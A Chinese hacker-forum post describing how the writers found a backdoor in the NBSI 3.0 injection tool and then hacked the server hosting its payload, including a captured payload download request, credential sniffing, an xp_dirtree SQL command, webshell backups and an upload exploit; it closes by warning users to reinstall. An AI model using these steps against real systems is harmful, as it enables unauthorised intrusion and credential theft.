首先,BS一下放後門的人,事實上是誰捆了,我們幾個人也已經該知道,也不想說了,他的人品大家都知道.... 工具可以在黑鷹基地下載(華北資源在線 ).下面的文章記錄昨天我們(小刀,茶茶,小莫)反攻的全過程. 剛拿到工具那天我就開始抓包分析工具哪些變化,例如加了getwebshell功能. 抓包的時候,發現突然多了一條路徑,向一個網站下載一個.exe文件,當時沒在意,之後突然發現自己向外的 數據包很大,這個時候茶茶在群裡說nbsi 3.0有後門,於是幾個人開始滲透過來. 數據包: GET /mp3/win.exe HTTP/1.1 Accept: */* UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322) Host: Connection: Keep-Alive 也就是nbsi後門轉向的站點. 我們幾個人分工,兩個對網段進行掃描,另外兩個對主機進行旁入. 旁入拿shell很容易就拿下,過程略,後來又在同網段下拿了台sa的肉雞, tracert 直接返回IP說明可以嗅. 茶茶和刀刀兩個負責嗅,而我繼續旁入,服務器的權限配置BT,想通過旁注很難. 這時茶茶嗅到一堆dbo權限的mssql賬號,還有一堆ftp賬號和密碼. 又開了1433,直接本地連接. exec master..xp_dirtree "d:/",1,1 從旁入的信息和分析得到路徑,接著備份一個shell,但是備出來老出現%>無法畢合,又換備php小馬. 但php小馬又出現超時,再翻了翻他的路徑,找到一個舊的動易程序,有上傳漏洞,剛剛好上去. 接著到那個mp3目錄下,發現了一堆網馬,為了測試,我們配了一個pcshare,然後我們運行nbsi 3.0 刀刀告訴我,我們幾個全部上線了,之後,我通知了xiaolu,還有一些好友,還包括中標的人(查後門中標的人).接著做了這個證明動畫. 好了,不多說了,具體怎麼想大家自己去想吧,這裡再次BS捆後門的人. 請使用過此工具的人注意,最好重做系統吧,不知道那個pc有沒有做過免殺!!! 【
,5自學網,5自學網
